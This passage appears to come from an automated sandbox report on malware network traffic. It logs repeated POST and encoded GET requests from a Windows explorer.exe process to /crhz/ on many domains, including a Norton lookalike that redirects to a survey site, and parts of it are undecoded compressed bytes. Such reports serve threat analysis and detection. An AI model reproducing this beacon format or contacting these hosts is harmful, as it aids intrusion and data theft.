                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.wylvxing.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:51.634735107 CET | 886 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:51 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    28 | 192.168.2.6 | 49750 | 156.227.6.30 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:55.318169117 CET | 887 | OUT | GET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:55.595813036 CET | 887 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:55 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    29 | 192.168.2.6 | 49751 | 173.230.227.171 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:00.945188999 CET | 888 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.popcors.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.popcors.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:01.085072994 CET | 889 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:01 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.2.6 | 49722 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:22.738095045 CET | 762 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sandpiper-apts.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.sandpiper-apts.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:22.946933031 CET | 768 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    30 | 192.168.2.6 | 49752 | 173.230.227.171 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:03.605473995 CET | 891 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.popcors.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.popcors.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:03.745745897 CET | 892 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:03 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    31 | 192.168.2.6 | 49753 | 173.230.227.171 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:06.273947001 CET | 892 | OUT | GET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.popcors.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:06.428262949 CET | 893 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:06 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    32 | 192.168.2.6 | 49754 | 162.241.2.66 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:11.759207010 CET | 894 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.thepromotionhunter.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.thepromotionhunter.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:12.033816099 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:11 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 10932
                                                    Content-Type: text/html; charset=UTF-8
                                                    Jan 30, 2023 13:42:12.033860922 CET897INData Raw: 43 29 b8 74 83 aa bc e1 5c c6 70 4c 1b 43 df 27 bd 6e be 22 bf d3 9c 89 06 6e ef 26 c2 ca 4a 7e b8 59 9a 69 fe 14 74 47 17 e3 51 7b 38 f0 7b 17 ed 71 d7 1f b4 2f c6 17 83 ea fd 97 f6 83 eb de fe 75 eb 8b 17 41 f8 02 41 06 83 de 60 d8 1e 0c c7 5d
                                                    Data Ascii: C)t\pLC'n"n&J~YitGQ{8{q/uAA`]>ln}^Ew{{sKyTt9[*__F+=.QeAIun.!6=|N6kr[{w5yo{N._,^O_
                                                    Jan 30, 2023 13:42:12.033884048 CET898INData Raw: 03 ef cc 43 35 1a 6d b9 cd ef 69 3c dc 84 5a 80 46 75 cb 30 e5 71 0c f2 f6 41 c1 91 55 85 cb 14 34 34 ab f2 52 4d a4 84 d2 a5 05 e5 19 ce 75 5d 9d b5 5a 84 dd 54 b7 5c 62 17 b7 a7 c2 8e 31 8e 0e b7 7c 70 fb e6 cd ac b0 56 c9 9b ca 1f ea bc 45 ff
                                                    Data Ascii: C5mi<ZFu0qAU44RMu]ZT\b1|pVER4K<B5GY$7-ylSMgu0BQ5H{&[1AKfwFclpaQ(&T 54<E&&l&+dUSYLj;R+%\gWs
                                                    Jan 30, 2023 13:42:12.033907890 CET899INData Raw: be 30 6c 6b 01 21 fa c8 e3 7b 1d 3f 95 17 9f 4d 37 65 48 57 35 fe b2 eb 74 47 4f ec 2e b3 78 d8 5f 1d 3e 11 61 a6 ac 55 d9 21 c4 e6 f4 89 18 ce fa 43 84 f2 ec 89 fd a5 d5 bf 3c c7 b9 83 ce 77 76 ee a0 ff 39 ce 1d 40 3c c3 b9 03 84 47 9d e3 59 f2
                                                    Data Ascii: 0lk!{?M7eHW5tGO.x_>aU!C<wv9@<GYS$1M9Kb&eZ3 ]^?p1p'dg%<'Bf^p42lIs,NL:$&Z37)M4[c9Q|rX3/kr&\:hQ}/xL5X:Qd\l
                                                    Jan 30, 2023 13:42:12.033931971 CET901INData Raw: bf 85 90 0c 07 7e be aa 2f 5c f2 18 36 55 41 d7 77 65 e4 d6 c3 3a c3 2d d0 99 50 d1 b5 41 b6 9c c5 b1 d3 66 55 1e 92 05 d3 cd 7b 58 5a 29 d4 bf 57 d3 9a ec 3a 30 ad 56 65 27 9b aa b2 96 23 4f 99 d9 aa db dc ee 09 d0 3c 49 ed 49 b4 b2 6a 4f 84 80
                                                    Data Ascii: ~/\6UAwe:-PAfU{XZ)W:0Ve'#O<IIjO&WtL@LACPHA"<BJ(QIsbh7S<9O`CJekH0c>6p2KCk7oy;ii]5k{MiGB-TfU \(mr.d
                                                    Jan 30, 2023 13:42:12.033955097 CET902INData Raw: d0 96 3f 1d 6a 5b 5e e7 b4 60 d1 35 9a 18 5d 27 5a 15 32 de 20 1e 1e 3c b6 00 87 50 b7 81 4d 62 b8 49 31 ec 6c fd 5e 24 87 60 35 7c cb 94 5b 78 2f 92 12 a1 2e 01 0c 73 9d 73 f9 7e 3e ed 50 6a 18 16 7c c1 63 aa 21 7e 2f 86 1d 4a 0d 83 28 32 2e 55
                                                    Data Ascii: ?j[^`5]'Z2 <PMbI1l^$`5|[x/.ss~>Pj|c!~/J(2.URE<I\$p;;HPGg0dXGBCPU@5<3fFJZ}/-H5^+tH/} u{CgJ{/-umtVnRh~!H2^v
                                                    Jan 30, 2023 13:42:12.033977032 CET903INData Raw: 07 56 46 33 15 33 b1 af af 3f 98 fb 83 a0 37 e8 8e 46 6c 36 f7 67 7e df 1f 9f d0 d7 3d 54 28 b8 bc 26 1a c4 b4 e1 f4 19 14 c8 72 ee 2d 3d a5 93 4e 83 e0 52 e7 77 37 c7 a5 ff 6a 50 64 83 74 ae f6 f0 be 8e b9 fd d3 0f df 35 88 5d e7 30 6d b0 3c c7
                                                    Data Ascii: VF33?7Fl6g~=T(&r-=NRw7jPdt5]0m<=Wh^q+_=tyy qXfL9[Gw]Q>m1{^3H!Y4J7HiW:^1d^PtR`LkfZ+)!AL-W!49+;.n.ivC-Ko+}
                                                    Jan 30, 2023 13:42:12.033999920 CET905INData Raw: f8 50 25 c6 a5 fa ea ec 32 e6 0b 12 09 66 4c 19 1c 07 87 a9 51 d1 b5 c1 c0 a4 c0 62 b7 8a dd 75 79 43 2d 64 39 6e 04 68 ce b4 6d dc c7 48 99 a1 89 50 33 26 f0 36 8e b9 4c 08 37 54 b0 b5 2a 2c 8d 94 34 56 33 2e 21 26 3b b4 44 ab 22 47 94 8f ce 3e
                                                    Data Ascii: P%2fLQbuyC-d9nhmHP3&6L7T*,4V3.!&;D"G>.,830yT,B`r|.`P]w@B\6v-F:S,\0h%+}D~t?4rd$0G#Mr2Z'`7A4QBpcy)@&iQs
                                                    Jan 30, 2023 13:42:12.034023046 CET906INData Raw: cb 5f 77 f2 16 9d e8 b8 01 aa 61 2e 3b 68 0b 9e 54 ee e1 03 66 0e bf 31 dc d9 d5 59 f5 76 86 7f 65 14 37 01 ab 0c 09 17 4c 37 29 c5 05 d0 5c 83 01 4b a9 c9 59 c4 65 42 e9 c8 6f 35 aa 35 a4 3c 8e 41 4e 1b 56 17 50 b3 55 6c 00 b7 9a 2d cf 65 27 63
                                                    Data Ascii: _wa.;hTf1Yve7L7)\KYeBo55<ANVPUl-e'c\Os,B@s-.)rH1qR7d%Z[G@X>\J0]=Cu]Ba'c6l|hVG3.q4r+=d$0GMr2NHebN


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    33 | 192.168.2.6 | 49755 | 162.241.2.66 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:14.433737040 CET | 908 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.thepromotionhunter.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.thepromotionhunter.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:14.759850025 CET | 910 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:14 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 10932
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    34 | 192.168.2.6 | 49756 | 162.241.2.66 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:17.102797985 CET | 921 | OUT | GET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:17.330441952 CET | 921 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 30 Jan 2023 12:42:17 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Location: http://thepromotionhunter.com/crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    35 | 192.168.2.6 | 49757 | 81.17.29.148 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:25.420042992 CET | 930 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.nortonseecurity.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.nortonseecurity.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:25.441071033 CET | 930 | IN | HTTP/1.1 302 Found
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 11
                                                    date: Mon, 30 Jan 2023 12:42:25 GMT
                                                    location: http://survey-smiles.com
                                                    server: nginx
                                                    set-cookie: sid=8c6659f6-a09b-11ed-a639-bfa5bb5044b3; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:32 GMT; max-age=2147483647; HttpOnly
                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                    Data Ascii: Redirecting


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    36 | 192.168.2.6 | 49759 | 81.17.29.148 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:27.962644100 CET | 932 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.nortonseecurity.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.nortonseecurity.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:42:27.983197927 CET | 933 | IN | HTTP/1.1 302 Found
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 11
                                                    date: Mon, 30 Jan 2023 12:42:27 GMT
                                                    location: http://survey-smiles.com
                                                    server: nginx
                                                    set-cookie: sid=8dea5cc8-a09b-11ed-9225-bfa5da083fb0; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:34 GMT; max-age=2147483647; HttpOnly
                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                    Data Ascii: Redirecting


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    37 | 192.168.2.6 | 49760 | 81.17.29.148 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:42:30.510034084 CET | 934 | OUT | GET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:30.531753063 CET | 935 | IN | HTTP/1.1 200 OK
                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 617
                                                    content-type: text/html; charset=utf-8
                                                    date: Mon, 30 Jan 2023 12:42:30 GMT
                                                    server: nginx
                                                    set-cookie: sid=8f6f24a2-a09b-11ed-b709-bfa5cc855204; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:37 GMT; max-age=2147483647; HttpOnly
                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.nortonseecurity.com/crhz/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NTA4OTc1MCwiaWF0IjoxNjc1MDgyNTUwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIyc3ZoZGQzOTM2YTFkMDdpMXM2OTk0NDMiLCJuYmYiOjE2NzUwODI1NTAsInRzIjoxNjc1MDgyNTUwNTE4MjIwfQ.hkRexKqMxOPWaSsOTAwZqMkeaMRXRcCk9VKDDwzcsys&s91Fd8=b8xjX_&sid=8f6f24a2-a09b-11ed-b709-bfa5cc855204&vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh%2FkgPh37+bmZ6fYtcBDUzbx8');</script></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.2.6 | 49724 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:25.484545946 CET | 770 | OUT | GET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:25.706928015 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    5 | 192.168.2.6 | 49725 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:30.970472097 CET | 771 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.tf8dangky.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.tf8dangky.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:31.172877073 CET | 772 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    6 | 192.168.2.6 | 49726 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:33.696614027 CET | 774 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.tf8dangky.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.tf8dangky.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:33.895081043 CET | 775 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:33 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    7 | 192.168.2.6 | 49727 | 18.138.206.213 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:36.425826073 CET | 775 | OUT | GET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:36.635482073 CET | 776 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:36 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    8 | 192.168.2.6 | 49728 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:41.845371008 CET | 777 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.teammart.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.teammart.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.teammart.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:42.128724098 CET | 778 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:40:41 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    9 | 192.168.2.6 | 49729 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:44.578386068 CET | 785 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.teammart.online
